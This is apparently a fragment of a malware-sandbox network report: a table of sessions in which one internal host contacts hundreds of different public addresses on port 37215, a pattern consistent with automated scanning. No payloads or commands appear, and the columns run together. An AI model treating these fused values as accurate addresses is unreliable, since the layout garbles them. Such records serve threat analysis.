                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16865192.168.2.155977841.74.134.20837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16866192.168.2.1541412156.168.30.18637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16867192.168.2.156045037.58.219.16137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16868192.168.2.1535574156.85.225.4337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16869192.168.2.1543306157.233.175.13837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16870192.168.2.1557198186.90.40.18637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16871192.168.2.1557584222.28.55.737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16872192.168.2.1538032190.109.128.22237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16873192.168.2.1560714156.195.234.8537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16874192.168.2.1538604190.117.61.18737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16875192.168.2.154828831.99.205.10937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16876192.168.2.1559566190.142.121.13137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16877192.168.2.1546452138.88.152.7837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16878192.168.2.1554788122.64.242.13937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16879192.168.2.1556148222.208.244.22137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16880192.168.2.155698837.159.47.23137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16881192.168.2.1555866121.182.201.14037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16882192.168.2.1552558157.194.39.24437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16883192.168.2.1541838122.233.154.14337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16884192.168.2.1544402157.80.241.9137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16885192.168.2.1541148156.75.186.22337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16886192.168.2.1546772187.155.77.21437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16887192.168.2.154179031.153.83.8337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16888192.168.2.1541316190.1.215.18637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16889192.168.2.154944070.177.4.6537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16890192.168.2.1546174121.117.134.5537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16891192.168.2.1554182197.141.32.20237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16892192.168.2.154142637.31.241.22237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16893192.168.2.1556754190.128.148.2737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16894192.168.2.1536740197.90.129.21837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16895192.168.2.155326245.214.215.19937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16896192.168.2.1560452102.228.218.1137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16897192.168.2.1553620138.78.164.18237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16898192.168.2.153343041.162.62.237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16899192.168.2.1535030190.82.131.19237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16900192.168.2.1550786222.235.118.15437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16901192.168.2.1548486190.100.204.2137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16902192.168.2.155809837.208.125.17837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16903192.168.2.154588231.118.167.12237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16904192.168.2.1560272222.30.225.16837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16905192.168.2.155961845.174.25.25437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16906192.168.2.1550292102.152.247.837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16907192.168.2.1548710102.78.119.4137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16908192.168.2.1533066197.233.159.15037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16909192.168.2.1555542156.203.28.9637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16910192.168.2.153485237.7.146.12437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16911192.168.2.1559198102.184.73.7837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16912192.168.2.1558938135.175.2.14037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16913192.168.2.1554466197.78.138.3537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16914192.168.2.1550812186.183.170.21737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16915192.168.2.1536868121.221.157.1537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16916192.168.2.1534140157.103.121.4137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16917192.168.2.154643045.17.15.5037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16918192.168.2.1538210181.244.243.10137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16919192.168.2.1553644186.69.250.18237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16920192.168.2.154809045.199.188.15537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16921192.168.2.1533838197.230.158.12437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16922192.168.2.155662831.11.151.7237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16923192.168.2.1541692157.202.39.20337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16924192.168.2.154724637.135.30.17937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16925192.168.2.155096294.249.73.14637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16926192.168.2.1542788190.0.175.13237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16927192.168.2.1536068186.109.42.25237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16928192.168.2.1545036157.154.163.8737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16929192.168.2.1548452174.135.233.24537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16930192.168.2.154757894.201.136.16337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16931192.168.2.155114631.42.32.11537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16932192.168.2.154210694.57.148.18737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16933192.168.2.154026441.91.167.19937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16934192.168.2.1558258222.94.56.15537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16935192.168.2.1546518180.17.208.16937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16936192.168.2.155374431.46.201.3537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16937192.168.2.1560646186.236.13.8637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16938192.168.2.1550380138.70.124.18837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16939192.168.2.1544832164.186.24.24137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16940192.168.2.1542640157.255.155.4237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16941192.168.2.1539950156.248.182.20137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16942192.168.2.1551992197.199.2.11337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16943192.168.2.1534264181.160.135.7637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16944192.168.2.153916237.110.100.12937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16945192.168.2.155233237.58.248.25337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16946192.168.2.1533456186.103.4.937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16947192.168.2.1535480122.96.27.4137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16948192.168.2.1551550190.17.223.7437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16949192.168.2.1549940157.249.200.4037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16950192.168.2.1551676197.200.7.337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16951192.168.2.1557912138.138.233.19737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16952192.168.2.1560602121.81.213.17437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16953192.168.2.156044637.88.26.3837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16954192.168.2.155005631.210.114.5337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16955192.168.2.1535900181.21.197.6237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16956192.168.2.153819831.204.110.10437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16957192.168.2.154264077.57.6.5337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16958192.168.2.154228437.74.224.8337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16959192.168.2.1541630121.54.16.25337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16960192.168.2.1559982222.91.160.16337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16961192.168.2.153869694.198.74.10337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16962192.168.2.1540884197.24.181.17537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16963192.168.2.154438094.22.152.19537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16964192.168.2.1557138121.150.230.3237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16965192.168.2.1549238156.11.18.16537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16966192.168.2.1545132181.108.90.16037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16967192.168.2.1556788122.200.150.1737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16968192.168.2.1539306197.47.78.21337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16969192.168.2.1557900122.254.239.16237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16970192.168.2.1558780157.219.245.18437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16971192.168.2.1537900181.175.160.9037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16972192.168.2.1553980138.61.0.18737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16973192.168.2.155037445.167.216.21637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16974192.168.2.1560570113.229.233.16837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16975192.168.2.1541398197.13.36.21837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16976192.168.2.1545380122.236.44.8137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16977192.168.2.1551520138.74.25.23937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16978192.168.2.1546700190.69.18.7537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16979192.168.2.154735494.156.13.13137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16980192.168.2.1558730197.254.107.3337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16981192.168.2.153989425.120.105.4137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16982192.168.2.1547992157.232.28.10837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16983192.168.2.1552676156.227.11.20037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16984192.168.2.154698442.44.195.19837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16985192.168.2.1548586102.93.206.11237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16986192.168.2.1552634222.29.40.18737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16987192.168.2.1560668156.124.200.10937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16988192.168.2.1535450156.176.1.337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16989192.168.2.1538064186.112.105.15637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16990192.168.2.1536772138.141.166.17037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16991192.168.2.156000494.178.46.24337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16992192.168.2.1555234157.52.116.22437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16993192.168.2.155162831.29.110.15837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16994192.168.2.155602894.41.80.15237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16995192.168.2.1533110222.206.52.15837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16996192.168.2.153279841.108.5.20637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16997192.168.2.1548930181.194.205.18037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16998192.168.2.1557918122.20.200.11837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16999192.168.2.1556790186.23.168.12037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17000192.168.2.154419041.204.76.4937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17001192.168.2.153394845.108.18.1637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17002192.168.2.154113837.7.148.13037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17003192.168.2.155476245.17.45.8337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17004192.168.2.153801445.21.6.6437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17005192.168.2.1549656186.93.138.4237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17006192.168.2.1554350138.36.28.17837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17007192.168.2.1550068197.176.236.12037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17008192.168.2.153687294.139.128.24137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17009192.168.2.1554520121.59.144.15737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17010192.168.2.153939231.88.41.5337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17011192.168.2.1553150186.65.81.137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17012192.168.2.1541710197.255.7.23937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17013192.168.2.1558932176.92.67.16437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17014192.168.2.1546002156.152.170.6337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17015192.168.2.1547588102.252.140.19237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17016192.168.2.1534926156.236.130.9737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17017192.168.2.154769494.130.34.25337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17018192.168.2.154288894.185.44.21637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17019192.168.2.1540608138.9.210.7137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17020192.168.2.1534918222.94.2.19337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17021192.168.2.1535078207.242.205.6137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17022192.168.2.1537666122.252.115.4837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17023192.168.2.153864645.166.216.10037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17024192.168.2.153508245.15.244.2337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17025192.168.2.1552034138.119.6.737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17026192.168.2.155354094.166.233.11937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17027192.168.2.1536614156.103.250.21637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17028192.168.2.153625831.53.223.22137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17029192.168.2.1537408222.72.121.9537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17030192.168.2.1538094197.54.214.7937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17031192.168.2.1537334151.179.206.237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17032192.168.2.1533468181.239.235.17537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17033192.168.2.1545646181.147.96.13237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17034192.168.2.1541784156.62.36.16337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17035192.168.2.1555266181.38.126.17437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17036192.168.2.1560100156.143.70.9237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17037192.168.2.1544732186.167.32.22237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17038192.168.2.1555758197.142.228.8637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17039192.168.2.1551292197.81.252.13737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17040192.168.2.1550880122.186.68.3537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17041192.168.2.1552578157.42.227.21337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17042192.168.2.1534450181.147.189.25337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17043192.168.2.1538634181.76.6.19337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17044192.168.2.1535984122.161.131.5237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17045192.168.2.155269241.40.76.22037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17046192.168.2.155871645.60.199.1237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17047192.168.2.1551936186.249.208.12637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17048192.168.2.1546328156.49.247.19037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17049192.168.2.1547250122.27.1.2437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17050192.168.2.155346241.115.94.23837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17051192.168.2.1534482102.47.138.6237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17052192.168.2.155636431.2.192.10737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17053192.168.2.1546722156.162.94.2337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17054192.168.2.1544230197.144.3.7737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17055192.168.2.1533562222.22.228.22537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17056192.168.2.1544060181.125.56.20537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17057192.168.2.1542784190.98.187.6737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17058192.168.2.155927494.58.134.13537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17059192.168.2.154780831.217.158.8837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17060192.168.2.153300294.72.73.10737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17061192.168.2.1548222181.122.137.23537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17062192.168.2.1534986156.85.72.11437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17063192.168.2.1545456156.200.40.5937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17064192.168.2.1535122138.173.142.22137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17065192.168.2.1538000181.255.210.23237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17066192.168.2.1533612186.4.190.8737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17067192.168.2.1553034186.248.239.11737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17068192.168.2.1551396197.181.233.1437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17069192.168.2.1541718121.245.183.25537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17070192.168.2.155040045.174.154.7737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17071192.168.2.1540428222.212.217.21037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17072192.168.2.155181441.99.198.20537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17073192.168.2.1558008130.196.158.3637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17074192.168.2.155306831.46.171.2637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17075192.168.2.1546560121.229.220.15437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17076192.168.2.1551064222.208.238.14637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17077192.168.2.1548080190.37.161.24937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17078192.168.2.1539842197.216.24.21237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17079192.168.2.1541512186.164.20.3037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17080192.168.2.154284041.79.219.18737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17081192.168.2.1533340156.13.194.23137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17082192.168.2.1538120157.58.72.2237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
